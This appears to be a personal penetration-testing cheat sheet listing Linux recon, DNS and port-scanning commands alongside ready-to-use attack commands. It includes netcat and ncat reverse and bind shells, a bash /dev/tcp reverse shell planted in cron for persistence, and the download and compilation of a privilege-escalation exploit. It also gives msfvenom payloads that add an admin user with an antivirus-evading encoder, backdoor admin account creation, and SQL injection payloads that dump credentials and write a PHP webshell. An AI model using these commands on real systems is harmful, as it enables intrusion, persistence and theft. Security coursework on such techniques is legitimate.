Locate
- Finding files
locate kim.txt
- Update
updatedb
- e.g.
locate nc.exe
Which
- See manual for which
man which
- e.g.
which sbd
find
- Manual
man find
- Find recursively
find . -name php.ini
- e.g.
find ~/ -name kim*
- execute after each find
find ~/ -name kim* -exec file {} \;
- more e.g.
sudo find /usr -name sbd* -exec file {} \;
Service
- Start a service (they are same)
sudo systemctl start apache2
sudo service apache2 start
/etc/init.d/apache2 start
Boot persistence
- Start at boot (they are same)
sudo systemctl enable ssh.service
sudo update-rc.d ssh enable
rcconf
grep with regular expression
- e.g. (only string)
grep -o '[A-Za-z0-9_\.-]*\.whatsapp.com' index.html
grep -o 'https://[A-Za-z0-9_\.-]*\.whatsapp.com' index.html
- e.g. regular expression
grep -e '[A-Za-z0-9_\.-]*\.whatsapp.com' index.html
grep -e 'https://[A-Za-z0-9_\.-]*\.whatsapp.com' index.html
Learn to write a bash script
-
nano cisco.sh
chmod 755 cisco.sh or chmod +x cisco.sh -
#!/bin/bash
for url in $(cat cisco.txt); do
host $url | grep "has address" | cut -d " " -f4
done - Scenario:
Grep all domains with app.com and return IP -
#!/bin/bash
for url in $(grep -o '[A-Za-z0-9_\.-]*\.*app.com' index.html | sort -u); do
host $url | grep "has address" | cut -d " " -f4
done - Scenario:
Ping once and return IPs that response to ping -
#!/bin/bash
for ip in $(seq 1 254);do
ping -c 1 10.123.38.$ip | grep "bytes from" | cut -d " " -f4 &
done
Netcat (old)
- Able to read and write to TCP & UDP
- e.g. connect to ssh
nc -nv 10.123.3.11 22
- e.g. connect to ftp
nc -nv 10.123.9.11 21
- e.g. chatting
Listening:nc -nlvp 4444
Connect back:nc -nv 10.123.3.11
- e.g. file transfer
Listener:nc -nvlp 4444 > download.exe
Connect to Listener:nc -nv victim 4444 < /file/to/upload.exe
- e.g. bind shell
Listener binding shell (providing cmd):nc -nvlp 4444 -e cmd
Connect to Listener:nc -nv host 4444
- e.g. reverse shell (when behind firewall)
From outside (setup listener):nc -lvp 4444
host behind firewall connect out:nc -nv 192.168.32.162 4444 -e cmd
ncat (new)
- ncat bind shell
Listener:ncat -lvp 4444 -e cmd --allow 192.168.32.162 --ssl
Connect to Listener:ncat -v 192.168.32.53 4444 --ssl
- ncat reverse shell (when behind firewall)
From outside (setup listener):ncat -lvp 4444 --allow 192.168.32.53 --ssl
host behind firewall connect out:ncat -v 192.168.32.162 4444 -e cmd --ssl
Google Search operators
- site:
site:”microsoft.com”
site:”microsoft.com” -site:”www.microsoft.com”
- filetype:
site:”microsoft.com” filetype:ppt “penetration testing”
- intitle:
intitle:”VNC viewer for Java”
intitle:”-N3t” filetype:php undetectable
- inurl:
inurl:”/control/userimage.html” camera
inurl:.php? intext:character_sets,collations intitle:phpmyadmin
- GHDB (Google Hacking DB)
https://www.exploit-db.com/google-hacking-database
DNS enumeration
- ns (nameserver)
host -t ns abc.com
- mx
host -t mx abc.com
- host
host abc.com
Forward DNS lookup
-
nano forward.sh
chmod +x forward.sh -
#!/bin/bash
for name in $(cat list.txt);do
host $name.abc.com | grep "has address"
done
Reverse DNS lookup
- Find the IP
host sub.abc.com
- Loop thru the IP segment e.g. /27 or /28
-
nano reverse.sh
chmod +x reverse.sh -
#!/bin/bash
for ip in $(seq 1 254); do
host x.x.x.$ip | grep "abc.com"
done
DNS zone transfer
- Find the nameservers for the domain
host -t ns abc.com
- Attempt transfer
host -l abc.com ns1.abc.com
host -l abc.com ns2.abc.com
-
#!/bin/bash
for server in $(host -t ns kim.sg | cut -d" " -f4); do
host -l kim.sg $server;
done
Port scanning with nc
- nc -nv -w 1 -z 10.123.9.11 1-65535
SYN Scanning
- No longer good for modern firewall
UDP Scanning
- Unreliable as network devices like routers and firewall may drop
Nmap scanning
- Scan a network with /24
sudo nmap -sn 192.168.32.0/24
- Save to output
sudo nmap -sn 192.168.32.0/24 -oG ping-sweep-nmap.txt
- Scan port 80 from /24 network (it’s not accurate for me)
sudo nmap -p 3389 192.168.32.0/24
- Scan top 20 ports
sudo nmap -sT --top-ports 20 192.168.32.0/24
- Scan for smb
sudo nmap -p 139,445 192.168.32.11-12 --open
- Scan with script
cd /usr/share/nmap/scripts
sudo nmap -v -p 80 --script all 10.123.3.13
nbtscan
- netbios scan
sudo nbtscan 192.168.32.0/24
- connect via rpcclient
sudo rpcclient -U “” 192.168.32.201 - srvinfo
- enumdomusers
- getdompwinfo
SNMP
- Scan for UDP on port 161
sudo nmap -sU -p 161 10.123.31.33
- Scan with 161
onesixtyone 10.123.3.1 readonly
onesixtyone 10.123.3.1 community_string
- Scan with bruteforce
onesixtyone -c community_string.txt 10.123.3.1
- Scan with 161 for multiple hosts
onesixtyone -c community 10.123.3.0/24
onesixtyone -c community -i ips.txt
- SNMP WALK v1
snmpwalk -c readonly 10.123.3.1 -v1
- SNMP WALK (running program
snmpwalk -c readonly -v1 10.123.3.1 1.3.6.1.2.1.25.4.2.1.2
- SNMP WALK (e.g. Cisco)
snmpwalk -c readonly -v1 10.123.3.1 iso.3.6.1.2.1.3.1.1.1
- SNMP WALK (e.g.)
snmpwalk -c readonly -v1 10.123.3.1 1.3.6.1.2.x
- snmp-check (e.g.)
snmp-check 10.123.3.1 -c readonly
Openvas
- Install gvm
sudo apt-get install gvm
- Setup
sudo gvm-setup
- Start
sudo gvm-start
- SCAP database is required
sudo gvm-stop
sudo runuser -u _gvm -- greenbone-feed-sync --rsync
sudo greenbone-scapdata-sync
sudo greenbone-certdata-sync
- Update
sudo runuser -u _gvm -- greenbone-nvt-sync
sudo runuser -u _gvm -- greenbone-feed-sync --type SCAP
sudo runuser -u _gvm -- greenbone-feed-sync --type CERT
sudo runuser -u _gvm -- greenbone-feed-sync --type GVMD_DATA
Restart system and try again.
Buffer Overflow (applications)
- pestudio
pestudio malware initial assessment winitor.com - OllyDbg
https://www.ollydbg.de/ - immunity debugger
https://www.immunityinc.com/products/debugger/
Buffer Overflow
- Convert SHELL Code to print (Hex string to text)
printf $(cat fake-payload.txt | tr -d '\n')
- Come back later for deeper study
Searchsploit
- e.g.
searchsploit slmail
FTP Server (setup on Kali)
- Install ftp server
sudo apt-get install pure-ftpd
- Setup for new ftp user
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null ftpuser
sudo pure-pw useradd offsec -u ftpuser -d /tmp
sudo pure-pw xyz
cd /etc/pure-ftpd/auth
sudo ln -s ../conf/PureDB 60pdb
sudo chown ftpuser:ftpgroup /tmp
sudo /etc/init.d/pure-ftpd restart
FTP. Run non-interactively (script)
- Create ftp.txt containing instruction
-
C:\Users\User\test>echo open 10.123.3.14 21 > ftp.txt
C:\Users\User\test>echo loginID>> ftp.txt
C:\Users\User\test>echo loginPW>> ftp.txt
C:\Users\User\test>echo GET test.txt >> ftp.txt
C:\Users\User\test>echo bye >> ftp.txt - Execute
ftp -s:ftp.txt
PowerShell
- Run PowerShell non-interactively
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File .\test.ps1
Escalation on Linux
- Basic OS info
cat /etc/issue
uname -a
- Download exploit (Write to a file)
wget -O test.txt ipv4.kim.sg
- Compile the exploit
gcc test.txt -o exploit
- Check the compiled file
file exploit
- Check current user privilege
id testuser
Escalation on Windows
- After escalation create new user
net user hacker hacker /add
- Add the new user to admin group
net localgroup administrator hacker /add
Windows weak service
- icacls (Integrity Control Access Control Lists)
icacls hamful.exe
- Replace the vulnerable service executable with hamful.exe
Linux weak service
- Find services with admin privileges (execute with low privileged user)
find / -perm -2 ! -type l -ls 2>/dev/null
- Similar
find / -perm -2
find / -perm -o=w
- Symbolic links (-type l)
find / -perm -2 ! -type l -ls 2>/dev/null
- Errors will not be output to console
2>/dev/null
Linux permission
- Find directories writable by anyone
sudo find /dir -perm -0002 -type d
- Find files writable by anyone
sudo find /dir -perm -0002 -type f
- Find files writable symbolic links by anyone
sudo find /dir -perm -0002 -type l
- Find both f & d (exclude symbolic links)
sudo find /dir -perm -2 ! -type l -ls
Reverse shell in cron
- Setup listener
nc -lvp 443
- Reverse shell command in cron
bash -i >& /dev/tcp/10.123.3.12/443 0>&1
Generate payload with msfvenom
- Window defender can detect
msfvenom -p windows/adduser USER=attackerkim PASS=Password123 -f c -o adduser.exe --platform Windows -a x86
- Bypass detection by encorder
msfvenom -p windows/adduser USER=attackerkim PASS=Password123 --encoder x86/xor_dynamic -f c -o adduser.exe --platform Windows -a x86
- Executing log file which was logging the payload
Entering php code on the address bar.
SQL Injection
- On login form
username' or 1=1;#
- Enumerate the table column. GET parameter on URL e.g. www.abc.com/comments
.php?id=123 order by 6
-
http://abc.com/comments.php?id=123 order by 6
# Study the result for injected behavior
php?id=123 or 1=2;#
# Check if sleep function works
php?id=123-sleep(1);
# Check if sleep works
select * from Staff where 1=1 -IF(MID(@@version,1,1)='8', sleep(1), 0);
php?id=123-IF(MID(@@version,1,1)='8', sleep(1), 0); - After knowing the total number of columns use union
-
http://abc.com/comments.php?id=123 union select 1,2,3;
http://abc.com/comments.php?id=123 union select 1,2,3,@@version;
http://abc.com/comments.php?id=123 union select 1,2,3,user();
.php?id=123 union select 1,2,3,table_name from information_schema.tables;
.php?id=123 union select 1,2,3,column_name from information_schema.columns where table_name='user_summary';
.php?id=123 union select 1,2,3,Login,Password FROM User; - Load host file
-
#Read a file
http://abc.com/index.php?id=123 union select 1,2,3,load_file("/tmp/test.txt");
#Write a file
http://abc.com/index.php?id=123 union select 1,2,3,"write some text" into OUTFILE '/tmp/k.php';
http://abc.com/index.php?id=123 union select 1,2,3,"<?php malicious();?>" into OUTFILE '/tmp/k.php';
SQL MAP
- sqlmap
sqlmap -u http://victim.com --crawl=1
- Access to shell
sqlmap -u https://victim.com/customer --dbms=mysql --os-shell --random-agent